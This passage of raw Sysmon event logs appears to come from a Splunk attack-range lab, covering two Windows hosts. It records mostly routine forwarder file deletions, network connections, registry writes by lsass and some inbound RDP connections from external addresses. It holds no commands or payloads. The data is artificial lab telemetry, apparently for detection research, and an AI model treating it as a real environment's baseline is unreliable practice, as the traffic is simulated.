Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56FCB84051E44EEAB655D9F05C2DC74B,SHA256=D630BDF11424D0793A60BB8B23909536F8430EE4F3812FB8805C8B774CD29705,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049246Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:06.884{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001049245Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:04.791{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53291-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049248Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:07.931{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCEE0F7E5C063443C4D8DF8C55366BD4,SHA256=88A5362588C808988708506D4D226672C58762639CE04EFD11F6E8CABD1BBBD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977849Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:07.607{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C62848EC419A9487517A937AB934C068,SHA256=A3D3158E5FF41C65DF386E716A11C17462676ECC15D220F9E083B13D41E9CDD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049249Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:08.932{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42927FC342BC75C5989AC3F3CC429725,SHA256=CAF088906DB8098C5810B989F985265EC341DF13FD85B380BB69B0DD3A8DB46D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977850Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:08.669{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=810E446B375F451D056974B041D81D48,SHA256=44628984DCB9A97FDFE439431FCC458D1C4D71C4D8F8ADD002E55DA4312C93E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049250Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:09.947{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AFD57A4EFDC5B686125CEE5395843FA,SHA256=FC006219F4ECC6941838BF418E41B115FE3B92986E78B7973C3D85BBF652413B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977852Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:09.716{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D77DE241359FF3F85F5B98C0ECBEFB54,SHA256=2EE23C54D16EC3A182B15A1DC0836E2170486E7AB64532055722FFD3B6DF486B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977851Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:05.751{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59325-false10.0.1.12-8000- 23542300x8000000000000000977853Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:10.732{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EA48BA06C32CD388D512FCA4056A0D2,SHA256=0E23A2317EA0AC30FC80FBB4A4FDEAA8FD02302FC4FA8D66CE72984BBBC4E718,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977854Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:11.747{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41C2388B07BEDFA7302B1D50E972C528,SHA256=CD856C459663F25CF7AE1733BA4A39B9B480F594D75ABB77774E9CEB9466783C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049253Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:11.885{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=64958BE93A5ABC8EDC4FFA69F4B84E9A,SHA256=67E03FAB7ECF11772FF82881E3E03F26C0100035C760BD32D7E4581E31CD9863,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049252Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:11.885{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6C985B93452B41FE7F72505351C01564,SHA256=BC5CC025DFF70027A051697BC7FF97FC32F069B2A536AD741D38AFCD944E8F5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049251Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:11.047{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC6281C2166C8BBB1E2C83B681BBEBFD,SHA256=51EDD2E51C35B8301C93292B8F41310B0530E643183F6C7B157BD1FFBBABC049,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977855Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:12.982{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CE35FE07A02525080E5B0C430CFE816,SHA256=FB025F48FC0341DDE47061B92C37DC4DAA5123AEB46258B12D4F6B56312FFC6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049254Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:12.047{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=471C95C2AD1A793E6C1523001CB2FAC8,SHA256=E632D56A7D74D4D4A05A245CBAA3784F3859F987BF10DBF53C6AEC23D96797C6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977859Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:10.241{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-57187-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977858Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:13.575{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977857Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:13.091{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1475F27EFC5029EE9F37FE06BD598218,SHA256=2D6FC435265A2EAD5C937008A76BA386552E95F479AC925F07FDBBFB58B40B7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977856Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:13.091{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=57BF991731E67338C0304DCD9C25CBBA,SHA256=924D0B5F605F9E836111FDD13D794BEFA32193A5DD95F69BB93E17B141C0FF91,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001049267Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:07:13.567{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001049266Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:07:13.567{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0fc9fdf0) 13241300x80000000000000001049265Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:07:13.567{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b376-0xadae04d5) 13241300x80000000000000001049264Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:07:13.567{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b37f-0x0f726cd5) 13241300x80000000000000001049263Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:07:13.567{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b387-0x7136d4d5) 13241300x80000000000000001049262Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:07:13.567{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001049261Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:07:13.567{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0fc9fdf0) 13241300x80000000000000001049260Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:07:13.567{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b376-0xadae04d5) 13241300x80000000000000001049259Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:07:13.567{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b37f-0x0f726cd5) 13241300x80000000000000001049258Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:07:13.567{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b387-0x7136d4d5) 23542300x80000000000000001049257Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:13.050{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3843F3FD7145E8D1B3FC13518741B335,SHA256=5F5C007A1C04C7C9AA1951D26E75372411C33FA92F692F1573C54F5FA826982B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049256Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:10.776{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53292-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001049255Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:10.270{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-64041-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x8000000000000000977862Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:12.204{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59327-false10.0.1.12-8089- 354300x8000000000000000977861Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:11.751{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59326-false10.0.1.12-8000- 23542300x8000000000000000977860Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:14.076{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A45B363437A01172E0DFC4B719F12FAF,SHA256=E46440AAA782FA373D8862FE6D745D81F6B49F603603C55A45921CA3AF630C4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049268Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:14.050{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33CD15A8B5593F46E42F474377F53642,SHA256=BC3A0B40DEF8E3197F6982CD292C7BB58F87E2696DF8871C5BD715B40F0A3CFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049270Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:15.118{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=64958BE93A5ABC8EDC4FFA69F4B84E9A,SHA256=67E03FAB7ECF11772FF82881E3E03F26C0100035C760BD32D7E4581E31CD9863,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049269Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:15.068{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA00A567FB7DB9FECF31B2632AF41A46,SHA256=DE315057BD0B51ED9C107311F04C5669429E0EC38B41441C49225C0336824A8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977863Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:15.185{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B019EFF7E73B5A3D2BD6757B78A7FC98,SHA256=5FA489774F873833B991858744B6F95F2435B7023014C54CB6E849CAA60F3CC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977864Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:16.263{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FD84C4B264A4A5B6BB47E52226312A4,SHA256=85A9EFCA0483175EC2EE0A04031D31C65081249ED73FD278B45F86956E45670F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049272Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:13.459{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-58552-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049271Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:16.086{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFE9ADC9A9F8021687105FEC07C3A766,SHA256=FE6324CC166085DAE775577F443A40849A109E8DC5D9819E970C1DD4EE233AA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977865Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:17.325{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91312E3F2707065F374EC3848127870E,SHA256=1B4D7CDF8F8AD8D386D94B60F1D232012243F1EA814CBCEC7FF4A4668887FE8E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049275Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:14.641{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59341-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049274Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:17.101{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5C57757A210B24FB352210C1EFCEADC8,SHA256=6C36AE9F67F6979A52DC366565D3C85417EFBAF711AD7B27E9823B00DE300D55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049273Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:17.101{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52C04F0E9264ECB6C433C900C631ABFE,SHA256=860E70472CDFA84A6C58F0E4EE40AEABADD3833620BCA422FAC75D406F391F17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977868Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:18.872{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3BCABC88F2BF13962E698106278286BF,SHA256=F9CEAFA53CE9201ED92ED72BB9C2CD1D4156CAF99581095B525EF33224F01511,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977867Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:18.872{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1475F27EFC5029EE9F37FE06BD598218,SHA256=2D6FC435265A2EAD5C937008A76BA386552E95F479AC925F07FDBBFB58B40B7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977866Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:18.357{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B95FFD8125F10E539F8957A57224B5AA,SHA256=50C63174450ADEDE83673AFACA24778329D33DD3AEC65AAAB3A830CDB3EAFC4D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049278Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:16.009{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53293-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001049277Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:16.009{5EBD8912-7F40-614D-2700-00000000FC01}2888C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53293-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 23542300x80000000000000001049276Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:18.147{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23377E122B124A54F52D0AFE8747A831,SHA256=87E4B7DB8565EE4166437274E24154B50D43285E8BF90E158614BC88DBC85C3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977870Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:19.591{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7240F0DAA5816C11E9196D388353F53C,SHA256=6A2C32BF433397DBDB36AFDFDC32001A0DDE1DBB51416319D177242FABF9E0BF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049280Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:16.756{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53294-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049279Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:19.187{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E207A484D817C334AB93654215D654C8,SHA256=CF87D2318E9138D07926C5049BD99BCE90E435A3822F2DA446A8E6CAD738A062,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977869Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:16.076{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de65289-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977873Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:20.732{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 